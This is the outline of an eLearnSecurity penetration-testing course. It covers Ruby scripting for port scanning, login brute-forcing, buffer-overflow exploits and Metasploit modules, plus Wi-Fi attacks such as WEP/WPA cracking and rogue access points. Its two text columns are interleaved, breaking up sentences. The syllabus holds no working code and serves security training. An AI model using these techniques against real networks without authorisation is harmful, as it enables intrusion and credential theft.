Regex is widely used in the security 5.1.2.5. Repetition
field; it is used to find and locate 5.1.2.6. Anchors
important information stored in files, 5.1.2.7. A real world example
web pages, network communication 5.1.2.8. More about regexp
and so on. 5.1.3. Regular expressions in the Ruby
5.1.3.1. Global Variables
A good knowledge of how to use and 5.1.3.2. Working with string
define regex is a ‘must’ for a 5.2. Dates and time
penetration tester! 5.2.1. Time class
5.2.1.1. Create a time instance
During the study of this module, the 5.2.1.2. Components of a time
5.2.1.3. Predicates and conversions
student will also learn how to use date
5.2.1.4. Arithmetic
and time classes as well as manage and 5.2.1.5. Comparisons
interact with files and directories: read, 5.2.1.6. From time to string
delete, create and so on. 5.2.2. Other classes
5.3. Files and Directories
5.3.1. Directories
5.3.1.1. Current Directory
5.3.1.2. Change Directory
5.3.1.3. Creation / Deletion
5.3.1.4. Directory Listings
5.3.1.5. Testing Directories
5.3.1.6. Dir Objects
5.3.1.7. Example: Windows
application directory listing
5.3.2. Files
5.3.2.1. Testing Files
5.3.2.2. Working with names
5.3.2.3. Create/Delete/Rename
5.3.2.4. Change permission
5.4. Conclusion
Downloadable scripts are included in this module

Module 6: Input / Output


6. Input / Output
6.1. File Stream
In this module, the student will learn 6.1.1. Reading from a file
how to use different input and output 6.1.2. Writing to a file
mechanisms and techniques in order to 6.2. Working with NMAP Files
find (read) or store (write) information 6.2.1. Ip extraction
6.2.1.1. Normal format
to and from files.
6.2.1.2. Grepable format
We will see several examples and 6.2.1.3. XML format
6.2.1.4. All together
scripts that can be used in conjunction
6.2.2. Open port extraction
with other tools (i.e. Nmap) in order to 6.2.2.1. Normal format
gather, filter and store important 6.2.2.2. Grepable format
information. 6.2.2.3. XML format
6.2.2.4. All together
6.3. Conclusion

Downloadable scripts are included in this module

Module 7: Network and OS Interaction


7. Network and OS Interaction
7.1. The network
Another very important topic that 7.1.1. Socket Basics
a penetration tester should master 7.1.1.1. TCP client
is ‘network communication’. 7.1.1.1.1. RFC868
7.1.1.1.2. Connection
In this module, the student will 7.1.1.1.3. Handle the result
learn how to use the power of 7.1.1.1.4. Sockets and blocks
7.1.1.1.5. A Wireshark view
Ruby in order to create, forge, 7.1.1.1.6. More about
intercept network 7.1.1.2. UDP client
communications. 7.1.1.2.1. RFC868
7.1.1.2.2. Datagram
Thanks to many useful examples sending/receiving
and scripts, the student will learn 7.1.1.2.3. Handle the result
7.1.1.2.4. A Wireshark view
how to create raw sockets, forge
7.1.1.2.5. UDP behaviour
packets, create TCP/UDP scanners 7.1.1.2.6. More about
and much more. 7.1.1.3. TCP Client/Server service
7.1.1.3.1. The Server
In the following module, we will 7.1.1.3.2. The Client
also see how to interact with local 7.1.1.3.3. Execution
and remote Operating Systems. 7.1.2. Penetration testing activities
7.1.2.1. Ping sweep
This, in conjunction with the 7.1.2.1.1. Net-Ping Gem
network communication skills, 7.1.2.1.2. The script
may be useful to create powerful 7.1.2.2. TCP Connection Port scan
tools (i.e. backdoors that are able 7.1.2.2.1. The strategy
7.1.2.2.2. The script
to retrieve information from
7.1.2.3. UDP Port scan
remote systems, as well as send 7.1.2.3.1. The strategy
and run specific commands). 7.1.2.3.2. The script
7.1.3. Raw Sockets
7.1.3.1. PacketFu
7.1.3.1.1. Installation
7.1.3.1.2. Usage
7.1.3.1.3. Forge a custom packet
7.1.3.1.4. Forge a packet (the best
way)
7.1.3.2. Tcp SYN port scanner
7.1.3.2.1. The strategy
7.1.3.2.2. The script
7.1.4. Conclusion
7.2. OS interactions
7.2.1. Kernel exec
7.2.2. Kernel system
7.2.3. Kernel backticks
7.2.4. IO popen
7.2.5. Open3 popen3
7.2.6. All together
Downloadable scripts are included in this module.

Hera Labs are included in this module.

Module 8: The Web


8. The Web
8.1. Starting point
In the previous module, the 8.1.1. HTTP Protocol
student will study network 8.1.2. Ruby's alternatives
communications and local 8.1.2.1. Using simple socket
interactions with the OS. Now it is 8.1.2.2. Net::HTTP library
8.1.2.3. Open-uri library
time to focus on Web Applications.
8.1.2.4. URI object
8.2. Request & Response
We will see how to create and
8.2.1. Net::HTTP class and instances
intercept HTTP and HTTPS
8.2.2. GET
requests and responses, as well as 8.2.2.1. Net::HTTP get
how to send/read GET and POST 8.2.2.2. Net::HTTP get_response
parameters and much more. 8.2.2.3. HTTPResponse object
8.2.2.3.1. Status
Along with these topics, the 8.2.2.3.2. Headers
student will be also presented with 8.2.2.3.3. Body
some useful scripts and use cases 8.2.2.3.4. Response object types
useful to run attacks against web 8.2.2.4. Parameters
8.2.2.4.1. Url encapsulation
application or identify
8.2.2.4.2. Dynamic parameters
vulnerabilities such as XSS. 8.2.2.5. Net::HTTP instances
8.2.2.5.1. Using get Instance
method
8.2.2.5.2. Using Http::Get request
object
8.2.2.5.3. URI and parameters
8.2.2.6. Request Headers
8.2.2.6.1. Using get Instance
method
8.2.2.6.2. Using Http::Get request
object
8.2.2.7. Working with Open-uri
8.2.2.7.1. Open method
8.2.2.7.2. Request Headers
8.2.3. POST
8.2.3.1. Using Net::HTTP post_form
8.2.3.1.1. Sessions and Cookies
8.2.3.2. Using Http::Post request object
8.2.3.3. Request Headers
8.2.3.3.1. Using post Instance
method
8.2.3.3.2. Using Http::Post request
object
8.2.3.4. Example: Post flooding
8.2.4. Persistent Connections
8.2.4.1. Example: Bruteforce login form
8.2.4.1.1. Response identification
8.2.4.1.2. Find a UserName
8.2.4.1.3. Using a dictionary
8.2.4.1.4. Using a string generator
8.2.5. HTTPS
8.2.6. Redirections
8.2.6.1. Identification
8.2.6.2. Follow the chain
8.2.7. Proxies
8.2.7.1. Http Proxies
8.2.7.2. Https Proxies
8.2.8. Other Verbs
8.2.8.1. OPTIONS
8.2.8.2. HEAD
8.2.8.3. Others
8.2.9. Conclusion
8.3. Data extraction
8.3.1. Regular Expressions
8.3.1.1. Example: email extraction
8.3.2. Document Parsing
8.3.2.1. Nokogiri
8.3.2.1.1. Installation
8.3.2.1.2. Documentation &
Tutorials
8.3.2.2. Example: Form extraction
8.3.2.3. Example: Detect XSS Reflected
8.3.2.3.1. Using the interpreter
8.3.2.3.2. A simple tool
8.4. Exercises
8.4.1. CMS detection
8.4.2. Hidden files
8.4.3. Indexing & Crawling
8.4.4. Subdomain enumeration
Downloadable scripts are included in this module.

Hera Labs are included in this module.

Module 9: Exploitation with Ruby


9. Exploitation with Ruby
9.1. ELS Echo Server
During the study of previous 9.1.1. The service
modules, the student should 9.1.2. Bug detection
have acquired many Ruby 9.2. The Exploit
programming skills. 9.2.1. Identify the buffer overflow space
9.2.1.1. Fuzzing
It is time to take advantage of 9.2.1.2. Using a debugger
these skills and use Ruby in 9.2.2. Writing the payload
9.2.2.1. Preamble
order to write and exploit
9.2.2.2. Return address
vulnerable services and 9.2.2.3. The payload
software. 9.2.3. Exploitation
In this module, we will present 9.2.3.1. The full code
a vulnerable application that 9.2.3.2. Exploit
the student can use to learn 9.2.4. Shell on the victim
9.2.4.1. Create the payload
how to write a full working
9.2.4.2. Write the script
exploit. 9.2.4.3. Exploitation
9.3. Conclusion

Downloadable scripts are included in this module.

Hera Labs are included in this module.

Module 10: Metasploit


10. Metasploit
10.1.Introduction
Now that the student has 10.2.ELS Echo Server
mastered Ruby and its features, 10.2.1. The service
it is time to start working with 10.2.2. The vulnerability
one of the most powerful Ruby 10.2.3. Exploitation with Metasploit
10.3.Architecture and Framework
tools: Metasploit.
10.3.1. Architecture
In this module, the student will 10.3.1.1. A snapshot
10.3.1.2. Files and Folders
study the Metasploit
10.3.2. Interfaces
architecture and the 10.3.2.1. MSFConsole
framework, and will learn how 10.3.2.2. MSFCli
to create, add or edit custom 10.3.2.3. Web interface
Metasploit modules. 10.3.2.4. Others
10.3.3. Libraries
Thanks to our virtual labs, the 10.3.3.1. Rex
student will also have the 10.3.3.2. Core Library
chance to practice against real 10.3.3.3. Base Library
10.3.4. Modules
vulnerable machines.
10.3.4.1. Exploits
10.3.4.2. Auxiliary
10.3.4.3. Payloads
10.3.4.4. Nops,Encoders
10.3.4.5. Post
10.3.4.6. The point
10.3.5. Plugins
10.3.6. Tools
10.3.7. Some considerations
10.4.Explore and write the ELS Echo module
10.4.1. Module type and location
10.4.2. Module high level structure
10.4.3. Module Information
10.4.4. The check method
10.4.5. The exploit method
10.4.6. Targets considerations
10.4.7. Conclusion
10.5.Meterpreter scripting
10.5.1. Meterpreter Basic API
10.5.2. Meterpreter scripts

Downloadable scripts are included in this module.

Hera Labs are included in this module.


Wi-Fi Section
The Wi-Fi Security section is an extremely in-depth section covering all the
most important attack techniques used against Wi-Fi networks. The student
will learn the security mechanisms implemented in Wi-Fi architectures as
well as their weaknesses and how to exploit them.

- Module 1: Prerequisites
- Module 2: Environment setup
- Module 3: Wireless Standards and Networks
- Module 4: Discover Wi-Fi Networks
- Module 5: Traffic Analysis
- Module 6: Attacking Wi-Fi Networks
- Module 7: Wi-Fi as attack vector

Module 1: Prerequisites
1. Prerequisites
1.1. Software
In the first module of the Wi-Fi section, 1.2. Hardware
we will see which are the 1.2.1. Antennas
hardware/software prerequisites of the 1.2.2. A note on signal strength
course. 1.2.3. Conclusions

Module 2: Environment setup


2. Environment setup
2.1. Introduction
In this module, the student will learn 2.1.1. Considerations on Linux drivers
how to properly configure the test 2.2. Adapter configuration
environment in order to obtain the best 2.2.1. Testing your setup
outcome from the successive modules.
Module 3: Wireless Standards and Networks
3. Wireless Standards and Networks
3.1. IEEE 802.11 Standards
In the following module, the 3.2. Types of Wireless Network
student will learn the basic 3.2.1. Infrastructure Network
concepts at the base of the Wi-Fi 3.2.2. Ad‐Hoc Network
infrastructures. 3.3. Wireless Frames
3.3.1. Management Frames
We will see which types of Wi-Fi 3.3.1.1. Beacon
configurations exist, how they work 3.3.1.2. Probe requests
3.3.1.3. Probe responses
and which are the security features
3.3.1.4. Authentication
and mechanisms implemented. 3.3.1.5. Association request
3.3.1.6. Association response
We will also present an overview of 3.3.1.7. Disassociation frame
the most important flaws that 3.3.1.8. Deauthentication frame
affect different types of Wireless 3.3.1.9. Reassociation
infrastructures and protocols. request/response
3.4. Security Features
3.4.1. Encryption
3.4.1.1. WEP
3.4.1.1.1. Initialization vector
3.4.1.1.2. RC4
3.4.1.1.3. Integrity Check Value
3.4.1.2. WEP flaws
3.4.1.2.1. Birthday paradox
3.4.1.2.2. Keystream reuse
3.4.1.2.3. Known plaintext attack
3.4.1.2.4. CRC-32
3.4.1.2.5. Bit-flipping attack
3.4.1.2.6. FSM attack
3.4.1.2.7. KoreK
3.4.1.2.8. PTW
3.4.1.3. WPA
3.4.1.3.1. Temporal Key Integrity
Protocol
3.4.1.3.2. CCMP/AES
3.4.1.4. WPA2
3.4.2. Authentication
3.4.2.1. Open System
3.4.2.2. Shared Key Authetication

Downloadable scripts are included in this module.

Module 4: Discover Wi-Fi Networks


4. Discover Wi-Fi Networks
4.1. Tools
The first step when we run a penetration 4.1.1. inSSIDer
tests against Wi-Fi networks is to discover 4.1.2. Kismet
and identify our target. 4.1.3. Airodump-ng
4.2. Hidden SSID
In this module, we will see how to do this 4.2.1. Network de-cloaking
through a series of tools available for
different platforms.

Downloadable exercises are included in this module.

Module 5: Traffic Analysis


5. Traffic Analysis
5.1. Capturing traffic
After the target network has been 5.2. Monitor mode
identified, the next step is to configure 5.3. Channel Hopping
our tools in order to sniff and intercept 5.4. Wireshark filters
the traffic. 5.5. Traffic decryption

This is a very important step for all the


attacks that come here after.

Downloadable exercises are included in this module.

Module 6: Attacking Wi-Fi Networks


6. Attacking Wi-Fi Networks
6.1. WEP
The following module focuses on the 6.1.1. Overview and Setup
attacks that can be executed on Wi-Fi 6.1.2. Deauthentication attack
networks. 6.1.3. ARP replay Attack
6.1.4. Cracking the key with aircrack-
The student will learn how to attack ng
and access remote Wi-Fi networks, 6.1.4.1. Running PTW attack with
obtain keys, password and much more, aircrack-ng
6.1.4.2. KoreK attack
according to their configuration and
6.1.5. Clientless WEP cracking
security mechanism. 6.1.6. Bypassing Shared Key
Authentication
We will first start exploring the attacks 6.1.7. Attacking the client
against WEP and then focus our tests 6.1.7.1. Caffe-Latte overview
on more secure networks: WPA, WPA2 6.1.7.2. Practical Caffe-Latte Attack
6.2. WPA and WPA2
and WPS.
6.2.1. The Four-Way Handshake
6.2.2. Capture the handshake
6.2.3. Using aircrack-ng against the
handshake
6.2.3.1. Build a wordlust with
crunch
6.2.3.2. A note on cracking speed
6.2.4. Exploit the GPU power
6.2.4.1. oclHashCat
6.2.5. Cracking as a Service
6.2.5.1. CloudCracker
6.2.6. Space-time tradeoff
6.2.6.1. Pyrit
6.2.6.2. Pre-built hash files
6.3. WPS
6.4. Conclusions

Downloadable exercises are included in this module.

Module 7: Wi-Fi as an attack vector


7. Wi-Fi as attack vector
7.1. Rogue AP
In the last module, of the Wi-Fi 7.1.1. A typical Rogue AP scenario
section, the student will learn how 7.1.2. Recover PRGA with a rogue AP
to use Wi-Fi as an attack vector. 7.1.3. Initiate a WPA/WPA2 handshake
7.1.4. Man in the Middle attack
7.2. Wardriving

This means that we will not attack


Wi-Fi networks, instead we will use
Wi-Fi in order to create fake
networks, obtain credentials, run
MitM attacks and much more.
About eLearnSecurity

A leading innovator in the field of practical, hands-on IT security training.

Based in Pisa (Italy), Dubai (UAE) and in San Jose (USA), eLearnSecurity is a
leading provider of IT security and penetration testing courses including
certifications for IT professionals.

eLearnSecurity mission is to advance the career of IT security professionals by


providing affordable and comprehensive education and certification. All
eLearnSecurity courses utilize engaging eLearning and the most effective mix of
theory, practice and methodology in IT security - all with real-world lessons that
students can immediately apply to build relevant skills and keep their
organization's data and systems safe.

© 2014 eLearnSecurity S.R.L


Via Matteucci 36/38
56124 Pisa, Italy

For more information, please visit http://www.elearnsecurity.com.

You might also like